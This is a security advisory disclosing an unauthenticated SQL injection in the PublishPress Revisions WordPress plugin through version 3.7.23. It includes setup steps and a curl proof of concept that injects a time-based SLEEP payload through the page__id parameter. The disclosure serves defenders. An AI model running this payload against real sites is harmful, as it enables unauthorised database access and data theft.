PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes < 3.7.24 – Unauthenticated SQL Injection | CVE 2026-32539

Description

The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.7.23 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Proof of Concept

Setup an static front page:
* WordPress Admin -> Settings -> Reading
* Select "A static page" under "Your homepage displays"
* Create or select a page
* Save changes

A revision of the front page must exist:
* Edit the front page
* Make a change and create a revision ("Create Revision" on editor's sidebar)
* Grab the revision ID and replace `{REVISION_ID}` with it:

curl -s -o /dev/null \
  -w "HTTP Status: %{http_code}\nTime: %{time_total}s\n" \
  "https://target.site/?rv_preview=1&page__id={REVISION_ID}%20AND%20SLEEP(10)--"

Expected output:
HTTP Status: 404
Time: 10.545315s

The 404 status is expected (revision preview logic for unauthenticated users), but the 10+ second delay proves the SQL injection executed (SLEEP(10) triggered).